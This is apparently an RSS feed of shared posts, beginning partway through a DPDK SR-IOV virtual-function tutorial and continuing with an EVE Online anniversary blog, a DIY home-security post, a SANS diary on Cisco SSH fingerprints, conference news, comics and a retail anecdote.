You can verify that the two VFs were created by this operation by checking whether two new entries were added when running: lspci | grep "Virtual Function", or by verifying that you have now two new symlinks under /sys/bus/pci/devices/0000:07:00.0/ for the two newly created VFs: virtfn0 and virtfn1.

Next, launch the VMs via qemu using PCI Passthrough, for example:


qemu-system-x86_64 -enable-kvm -cpu host \
    -drive file=Ubuntu_1604.qcow2,index=0,media=disk,format=qcow2 \
    -smp 5 -m 2048 -vga qxl \
    -vnc :1 \
    -device pci-assign,host=0000:07:02.0 \
    -net nic,macaddr=00:00:00:99:99:01 \
    -net tap,script=/etc/qemu-ifup.

Note: qemu-ifup is a shell script that's invoked when the VM is launched, usually for setting up networking.

Next, you can start a VNC client (such as RealVNC client) to access the VM, and from there, you can verify that the VF was indeed assigned to it, with lspci -n. You should see a single device, which has "8086 154c" as the vendor ID/device ID combination; "8086 154c" is the virtual function PCI ID of the I40E NIC. You can launch a DPDK application in the guest on top of that VF.

Kernel VF

To conclude this example, let's create a kernel VF on the host and run a DPDK on top of it in the VM, and then let's look at a simple interaction with the host PF.

First, create two kernel VFs with:


echo 2 > /sys/bus/pci/devices/0000:07:00.0/sriov_numvfs

Here again you can verify that these two VFs were created by running lspci | grep "Virtual Function".

Next, run this sequence:


echo "8086 154c" > /sys/bus/pci/drivers/pci-stub/new_id
echo 07:02.0 > /sys/bus/pci/devices/$VF_PCI_0/driver/unbind
echo 07:02.0 > /sys/bus/pci/drivers/pci-stub/bind

Then launch the VM the same way as before, with the same qemu-system-x86_64 command mentioned earlier. Again, in the guest, you should be able to see the I40E VF with lspci -n. On the host, doing ip link show will show the two VFs of eth8: vf 0 and vf 1. You can set the MAC addresses of a VF from the host with ip link set—for example:


ip link set eth8 vf 0 mac 00:11:22:33:44:55

Then, when you run a DPDK application like testpmd in the guest, and run, for example, show port info 0 from the testpmd CLI, you'll see that indeed the MAC address that you set in the host is reflected for that VF in DPDK.

Summary

This article provides a high-level overview of the DPDK project, which is growing dynamically and gaining popularity in the industry. The near future likely will bring support for more network interfaces from different vendors, as well as new features.

06 May 14:17

Fanfest & Birthdays! - New Eden Turns Teenager!

by CCP Falcon

Another year has come and gone for New Eden, with today marking the thirteenth anniversary of the release of EVE Online.

For over a decade now, time and time again our community has completely destroyed the assumptions and expectations of what a massively multiplayer game should be. Year on year the pilots who inhabit this incredible universe that we’ve all created together have continued to tread new ground, creating incredible player driver narratives, new challenges for CCP as developers, and some of the largest conflicts, wars and propaganda campaigns ever seen in gaming, along with amazing player created software, spectacular EVE videos and amazing support networks such as Broadcast 4 Reps.

Before we look at Fanfest and the 13^th Anniversary in a little more depth, let’s listen to a few important words from CCP Seagull, Executive Producer for EVE Online as she shares her thoughts on New Eden’s 13^th year!

After watching the latest video blog from CCP Seagull and starting to put together this blog, I also took a look back and charted my own journey with EVE, surprised at what I found and the sheer amount of nostalgia that came back as I retraced that journey and remembered all the events I’ve either been part of or have witnessed as a player in EVE over the last thirteen years.

From the Great Northern War to the blockade of Mara by m0o corp, the Zombies smartbomb attack on Yulai, the Rise and fall of NVA, CFS, Stain Alliance, Ascendant Frontier, Fountain Alliance, Xetic Federation, Curse Alliance, and many more.

The collapse of Band of Brothers, the advance then retreat of Red Alliance, the rise of GoonSwarm and their eventual collapse, only to be reformed again, all of these are stories that were written by the actions and aspirations of pilots in New Eden.

The list really does go on, in no particular order, with the loss of the first titan, affectionately named “Steve”, the rise of the Interstellar Starbase Syndicate, then their execution at the hands of a coalition of angry alliances lead by the Interstellar Alcohol Conglomerate when their neutrality was called into question.

The war for Providence that saw Ushra’Khan ousted from Unity Station in 9UY4-H, the Battle of Asakai, the Bloodbath of B-R5RB, and more recently the battle of M-0EE8 as the Moneybadger Coalition was formed and the collapse of Mercenary Coalition, who also recently reformed and returned to the fold.

These are all stories of political intrigue, conflict, betrayal, teamwork, loyalty and in some instances cluster wide war that have been crafted by the actions and interactions of our community, which form the very fabric of the living work of Science Fiction that is New Eden.

And so we come to 2016, with thirteen years of history behind us, and who knows how many stories yet to be told. Conflict continues to rage across New Eden, with more and more tools placed in the hands of our intrepid pilots each release to assist them with continuing to build their own empires.

From the simple miner who’s happy to spend their time seeking out and harvesting resources to fuel New Eden’s cycle of creation and destruction, to the coalition leader who commands fleets of thousands on a whim, we want to make sure we continue to expand and enhance the opportunities our pilots have to continue to create these amazing stories.

As we showed at Fanfest 2016… here’s a quick rundown of the last year in terms of features and content that have been added to New Eden:

Fanfest 2016

Speaking of both Fanfest and amazing stories, now that the dust has settled and we’ve all recovered from an epic Fanfest 2016, let’s take a look back at some of the highlights of what was an amazing event this year here in Reykjavik.

This year we had more player focused content than ever before at Fanfest, with presentations and roundtables from ExookiZ, Gnaeus Crassus, Steve Ronuken, Makoto Priano, Max Singularity and QuantumDelta to name but a few, who shared their experiences and stories with attendees and those watching from home via the o7 Live Stream.

Cosplay

Of course, presentations weren’t the only thing that our players managed to get up to during Fanfest. With the return of the Fanfest Cosplay Contest this year we saw some of the most creative cosplay yet at an EVE Event, and three lucky winners took home a considerable bounty of prizes.

A huge shout out to Sancta Bassilica, Gomby Roffo and Max Singularity who took away a bounty of prizes this year including PLEX, a GTX 970 video card, signed chronicle artwork and mentions in chronicles that will be written over the course of 2016.

Things got a little hairy in a couple of instances, with Fedos and rebellious Matari on the loose, but thankfully we were able to contain any diplomatic incidents this time around.

Pub Crawl

Each year when Fanfest rolls around, one of the highlights of the event is the annual pubcrawl around downtown Reykjavik. This year was no exception as our pilots rolled out in force across bars in the downtown area after starting out with beer and a Brennivín toast at Harpa.

Once again, as is traditional at Fanfest, pilots were able to raise a glass to interstellar conquest, before heading to the final destination of the night, Iðnó, to finish up the pub crawl with the best dance party this side of The Glittering Dream nightclub in Caille.

Amarr Championships

As well as being incredibly close to the 13^th anniversary of New Eden, Fanfest 2016 played host to one of the most important events in recent backstory, the finals of the Imperial Succession trials – The Amarr Championships.

Lysus lead a team of retainers for house Kor-Azor against Kelon Darklight, fronting his team for house Tash-Murkon. Fanfest saw a bloody best of five that went right down to the wire in the final match, with Kelon Darklight’s team claiming victory.

With the Amarr Championships now concluded, EVE players have yet again left their mark on the very fabric of New Eden, deciding the fate of an Empire and who will lead it for the foreseeable future, with the efforts of Kelon Darklight and his team of retainers securing the ascension of Empress Catiz I to the Golden Throne of the Amarr Empire.

In addition to the entertainment, pub crawl and more player focused content than ever before at Fanfest, we once again hosted the Fanfest Charity Evening, which by popular demand returned to Kolabrautin, the restaurant on the top floor of Harpa. There players and developers alike had the chance to share drinks, dinner and stories from New Eden.

Supporting the Charity Evening this year we had the traditional Fanfest Silent Auction, which contained more than fifty lots this year and raised more than $5,700 as part of the Fanfest 2016 charity drive.

When totaled up with the $10,430 that was raised by the charity evening, this gave us a grand total of more than $16,100 raised for Barnaspítali Hringsins, the Icelandic Children’s Hospital, during Fanfest 2016. We couldn’t be more proud of our players for this contribution to an incredibly worthwhile cause.

The Party on top of the World

I’d really love to try to explain this, but in this case “a picture is worth a thousand words” really is true.

Here’s a few from the Party on top of the World…

Thirteen years…

I remember the release of EVE, and expecting the game to last maybe a year or two. I remember thinking “an incredibly ambitious game made by a group of crazy Vikings from a country I’ve barely heard of… It looks interesting, I’ll play it while it lasts”.

Then I remember two years in thinking “I’m gonna start my own corporation, it looks like this is getting really serious…”

Eight years later and after many visits to Iceland, I boarded a plane in 2012 to come work full time for CCP after being a player, an ISD Volunteer, a CEO, a Fleet Commander, an industrialist, a miner, a PvPer and even a scammer in New Eden.

After thirteen years, EVE has gone from this:

To this:

In all that time, one thing has stayed the same. Always committed, never wavering, always hungry for more. More creation, more destruction, more conflict, more politics, more of a challenge.

Today we don’t just celebrate the thirteenth anniversary of EVE, we celebrate what makes EVE unique, intriguing and what keeps the cycle of creation and destruction flowing that forms the heart of New Eden.

That one thing is our community, who over the last thirteen years have taken EVE from strength to strength with incredible narratives of war, conflict, espionage, political drama and betrayal.

Paradoxically, in 13 years this amazing community has also raised over half a million dollars for charity, founded its own in game charities to assist gamers in need such as Broadcast 4 Reps, Care 4 Kids and The Best of Us, and has shown unbelievable support for each other both in times of need and during real world gatherings when rival pilots come together to share drinks and stories.

Granted, there have been a few ups and downs along the way and the odd bump in the road, but today EVE Online has never been in a stronger position to push forward and break new boundaries, and this is in large part due to the dedication, passion, creativity and tenacity of our community.

With citadels springing up across New Eden, we’re seeing the dawn of a new age of control over the cluster for our community, and there’s still so much more to come.

From everyone here at CCP Games, thank you all sincerely for an incredible thirteen years.

As we roll into year fourteen, and toward the 20^th Anniversary of CCP, here’s to many, many more ahead.

@CCP_Falcon

EVE Universe Community Manager

24 Apr 13:02

Small Experiments in DIY Home Security

by Gerrit Coetzee

[Dann Albright] writes about some small experiments he’s done in home security.

He starts with the simplest. Which is to purchase an off the shelf web camera, and hook it up to software built to do the task. The first software he uses is the free, iSpy open source software. This adds basic features like motion detection, time stamping, logging, and an interface. He also explores other commercial options.

Next he delves a bit deeper. He starts by making a simple motion detector. When the Arduino detects motion using a PIR sensor it gets a computer to text an alert. After the tutorial begins to veer a little and he adds his WiFi light bulbs to the mix. Now he can send an email and change the color of the lights.

We suppose, that from a security standpoint. It would really freak a burglar out if all the lights turned red when they walked into a room. Either way, there’s definitely a fun weekend project in playing around with all these systems.

Filed under: home hacks

10 Feb 17:52

02/10/16 PHD comic: 'In your dreams'

Piled Higher & Deeper by Jorge Cham		www.phdcomics.com

title: "In your dreams" - originally published 2/10/2016 For the latest news in PHD Comics, CLICK HERE!

RaptoR, Tom and -1 others like this

05 Sep 15:15

Linux Plumbers Conference 2016 call for organizers

by corbet

It's time to figure out who will be organizing the Linux Plumbers Conference in 2016, which is planned to be held in Santa Fe, New Mexico, at the beginning of November, alongside the Kernel Summit. Interested organizers should put together a bid and submit it to the Linux Foundation's Technical Advisory Board by October 5; see this page for details on how the process works. "This is your chance to put your stamp on one of our community's most important gatherings in a year when we will be celebrating 25 years of the Linux kernel."

03 Apr 15:39

SSH Fingerprints Are Important, (Fri, Apr 3rd)

Some years ago, I was preparing Cisco certification exams. I connected via SSH to a new Cisco router, and was presented with this familiar dialog:

This made me think: before proceeding, I wanted to obtain the fingerprint out-of-band, via a trusted channel, so that I could verify it. So I took a console cable, logged on via the serial console, and then I started to wonder what IOS command to type? A couple of hours later spend with Google, I was no closer to a solution. I could not find an IOS command to display the SSH fingerprint.

I found forum posts advising to connect via a crossover cable and write the presented SSH fingerprint down, but thats not what I wanted. I had to work out my own solution.

Theres an IOS command to dump your public key: show crypto key mypubkey rsa

If you take the modulus and exponent of your public key, arrange them in another format (ssh-rsa) and calculate the MD5 hash, then you obtain the fingerprint.

Of course, I could not resist writing a Python program for that :-)

You can find it here.

If you know a Cisco IOS command to obtain the SSH fingerprint key directly, then please post a comment.

Update: on Cisco IOS versions released after I researched this, the show ip ssh Authentication retries: 3
Minimum expected Diffie Hellman key size : 1024 bits
IOS Keys in SECSH format(ssh-rsa, base64 encoded):
ssh-rsa AAAAB3NzaC1yc2EAA.....

If you decode the base64 encoded ssh-rsa data, and calculate the MD5, you obtain the fingerprint.

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

13 Sep 16:25

A Little Bird Told Her Wrong

Retail | FL, USA

(I work at a horse supply/tack store. We don’t sell any sort of animal.)

Me: “Hello. How can I help you?”

Customer: “Hi. Do you sell pigeons?”

Me: “What’s a pigeon?”

Customer: “You don’t know what a pigeon is?”

Me: “Well, like the bird, pigeon?”

Customer: “Yes.”

Me: “No, we don’t sell birds.”

Customer: “What type of store is this that you don’t sell birds?”

Me: “Uhm, a horse supply store.”

Customer: “Oh, the yellow pages didn’t say anything about that!”

11 Jun 09:32

06/11/14 PHD comic: 'The Turing Test'

Piled Higher & Deeper by Jorge Cham		www.phdcomics.com

title: "The Turing Test" - originally published 6/11/2014 For the latest news in PHD Comics, CLICK HERE!

byron lewis, Seth Koenig and 11 others like this

23 Apr 10:19

04/21/14 PHD comic: 'An Honest Methods Section'

Piled Higher & Deeper by Jorge Cham		www.phdcomics.com

title: "An Honest Methods Section" - originally published 4/21/2014 For the latest news in PHD Comics, CLICK HERE!

RaptoR, Seth Koenig and 18 others like this

Tom

Shared posts